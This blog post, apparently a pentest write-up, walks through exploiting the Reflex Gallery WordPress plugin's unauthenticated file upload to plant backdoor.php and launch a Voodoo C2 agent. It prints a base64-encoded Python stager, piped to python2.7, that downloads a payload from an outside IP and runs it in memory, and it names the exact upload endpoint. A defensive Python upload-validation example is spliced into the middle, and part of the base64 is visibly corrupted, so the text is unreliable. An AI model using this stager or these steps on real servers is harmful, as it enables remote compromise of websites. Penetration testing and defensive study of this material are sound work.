Initial Access via Web Application Vulnerabilities with Voodoo

Thomas Butler
Published in Stage 2 Security
3 min read · Sep 24, 2019

In this post, we will be taking a look at a real-world pentesting scenario. In this scenario, we will identify a vulnerability in the web application we are testing and leverage that vulnerability to execute a Voodoo agent on the server.

Our Target

For this scenario, our client has requested that we examine their WordPress blog server for vulnerabilities. They give us the IP address of the server and we get to work.

Vulnerability Scan

We’ll use the popular WPScan tool to scan the WordPress server and help identify potential vulnerabilities. WPScan can identify the version of WordPress that the server is running, the WordPress users, the themes and plugins that WordPress is using, and whether those themes and plugins contain known vulnerabilities.

The following WPScan syntax will attempt to enumerate plugins with known vulnerabilities on our target WordPress server:

[Image: Executing WPScan against target]

The results let us know that WPScan identified that a vulnerable version of the Reflex Gallery WordPress plugin (version 3.1.3) is in use:

If we research the CVE, we come up with:

This vulnerability allows an unauthenticated attacker to upload an arbitrary file to the server. While this vulnerability may not seem significant at first, if the server allows us to upload a PHP file and then browse to it, we may be able to achieve remote code execution and compromise the server with this two-step exploit.
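As an added illustration (not code from this post and not the Reflex Gallery plugin, which is written in PHP), the following Python sketch places an unchecked upload handler beside a hardened one, to show which missing checks turn a plain file upload into the two-step remote code execution described above. The function names, the image allowlist, the magic-byte table and the upload root are assumptions made for the example.

```python
import os
import secrets

# Added example, not the plugin's code: an unchecked upload handler beside a
# hardened one. Function names, allowlist and upload_root are assumptions.

# A gallery uploader only needs images; everything else is refused.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}

# Leading bytes ("magic") expected for each allowed type.
MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}

# Extensions a common PHP handler configuration will execute. They are refused
# anywhere in the name, so "shell.php.png" is rejected along with "backdoor.php".
EXECUTABLE_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps"}


def unchecked_accept(filename, content, authenticated, upload_root):
    """The defective pattern: no authentication, caller-chosen name, no type
    check. Returns the path the file would be written to. Because the uploads
    tree is web-reachable and the name is caller-controlled, step two of the
    attack (browsing to the file) is all that remains."""
    return os.path.join(upload_root, filename)


def hardened_accept(filename, content, authenticated, upload_root):
    """Return (True, destination_path) or (False, reason)."""
    # 1. Unauthenticated callers never reach the file system.
    if not authenticated:
        return False, "upload requires an authenticated user with upload capability"

    # 2. Strip any directory component and examine every dotted segment.
    base = os.path.basename(filename)
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False, "missing base name or extension"  # also refuses dotfiles
    if any(p in EXECUTABLE_EXTENSIONS for p in parts[1:]):
        return False, "server-executable extension refused"
    ext = parts[-1]
    if ext not in ALLOWED_EXTENSIONS:
        return False, "extension not in allowlist"

    # 3. The bytes must look like the type the name claims.
    if not content.startswith(MAGIC[ext]):
        return False, "content does not match declared image type"

    # 4. Server-chosen random name: the uploader no longer knows the URL.
    return True, os.path.join(upload_root, secrets.token_hex(16) + "." + ext)
```

The application-level checks are only half of the defence: the web server should also be configured not to hand files under the uploads tree to the PHP interpreter, so that even a file that slips past validation cannot be executed by browsing to it.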

Staging the Attack

The vulnerability we have identified allows us to upload a PHP file and then potentially access it to execute it. So we need to craft a PHP file that will execute a Voodoo stager when accessed. To begin, we generate a stage from the Voodoo Web Console. It should look something like this:

echo "exec('aW1wb3J0IGN0eXBlcywgdXJsbGliMiwgc3NsLCBvcywgcmFuZG9tCnggPSB1cmxsaWIyLlJlcXVlc3QoJ2h0dHBzOi8vNTQuOTEuMjEyLjE0OjUwMDAvZ2VuLzFiNzMzMWFiLTkxOTktNDVkOC04NWfsdfasdfdsfdGVfdWw52ZXJpZmllZF9jb250ZXh0JykpIGVsc2UgdXJsbGliMi51cmxvcGVuKHgpCnJhbmRvbS5zZWVkKDUxMDkyNSkKc28gPSAnJy5qb2luKFtjaHIob3JkKHgpXnJhbmRvbS5yYW5kcmFuZ2UoMjU2KdaSkgZm9yIHggaW4geHMucmVhZCgpXSkKZmQgPSBjdHlwZXMuQ0RdMTChOb25lKS5zeXNjYWxsKDMxOSwgJycsIDEpCm9zLndyaXRlKGZkLCBzbykKdiA9IGN0eXBlcy5DRExMKCcvcHJvYy9zZWxmL2ZkLycgKyBzdHIoZmQpKQpvcy5jbG9zZShmZCkKdi52b28oJy91c3IvYmluL2FwdCcsIfCd1cGRhdGUnKQo='.decode('base64'))" | /usr/bin/python2.7

Next, we write a PHP file using the shell_exec function to execute the stager code.

In this example, we save the file as backdoor.php.

[Image: Using curl to upload the backdoor]

With our attack staged, we’re ready to leverage the vulnerability. Based on online exploit research, the arbitrary file upload (AFU) is accessed by POSTing the file to wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php and providing the Year and Month parameters.

[Image: Utilizing the AFU to upload a Voodoo stager]

Now that we’ve successfully leveraged the vulnerability and uploaded our payload, we just need to access the file to execute the Voodoo stager. We’ll do this with the following curl command:

If we take a look at the Voodoo web console, we will see that the PHP code was successfully executed and that the Voodoo agent is now running on the target.
